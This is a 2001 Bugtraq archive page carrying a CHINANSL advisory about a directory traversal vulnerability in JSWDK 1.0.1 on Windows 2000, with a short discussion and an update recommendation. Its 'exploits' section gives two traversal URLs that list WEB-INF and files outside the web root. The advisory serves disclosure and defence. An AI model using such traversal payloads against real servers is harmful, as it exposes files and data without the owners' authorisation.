Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

CHINANSL Security Advisory(CSA-200106)

From: lovehacker <lovehacker () 263 NET>
Date: Wed, 28 Mar 2001 06:48:07 -0000
Topic:
JavaServer Web Dev Kit(JSWDK)1.0.1 for win2000 
Directory traversal Vulnerability

vulnerable:
Microsoft Win2000
¡¡¡¡+JSWDK1.0.1
maybe for other operating system also.

discussion:
A security vulnerability has been found in Windows 
NT/2000 systems that have JSWDK 1.0.1 
installed.The vulnerability allows remote attackers to 
access files outside the document root directory 
scope.

exploits:
http://localhost:8080/examples//WEB-INF/ 
listing /WEB-INF/ Directory .

http://localhost:8080/../examples//WEB-INF/../../../../../
if JSWDK installd in c:\ the question will listing c:\ all 
file and directory.

solution:
Update JSWDK

Copyright 2000-2001 CHINANSL. All Rights 
Reserved. Terms of use. 

CHINANSL Security Team 
<lovehacker () chinansl com> 
CHINANSL INFORMATION TECHNOLOGY CO.,LTD 
(http://www.chinansl.com)
Previous By Date Next
Previous By Thread Next

Current thread: